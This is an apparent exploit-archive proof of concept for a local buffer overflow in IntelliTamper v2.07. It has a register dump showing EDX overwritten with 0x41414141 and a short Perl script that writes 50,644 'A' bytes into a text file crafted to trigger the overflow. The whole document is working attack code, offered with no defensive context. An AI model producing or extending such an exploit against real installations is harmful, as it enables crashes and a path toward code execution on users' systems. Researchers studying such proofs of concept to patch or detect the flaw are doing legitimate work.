# Author: ZoRLu # Home: yildirimordulari.com & z0rlu.blogspot.com & dafgamers.com # Msn: trt-turk@hotmail.com # Not: herkes hecker olmus :S # intellitamper v2.07 (.txt file ) Local buffer overflow POC # EAX 7EFEFEFE # ECX 3F82EA97 # EDX 41414141 # EBX FE0C702F # ESP 001235C8 # ESI 01F455A4 # EDI 00130000 ASCII "Actx " # EIP 00416369 intellit.00416369 # EDX 41414141 for char 50644 # -------------------------------------------------------- #!/usr/bin/perl #[*] intellitamper v2.07 (.txt file ) Local buffer overflow POC use warnings; use strict; my $chars = "\x41" x 50644 ; my $file="z0rlu.txt"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $chars; close($FILE); print "$file Dosya Hazir. \n"; # ----------------------------------------------------------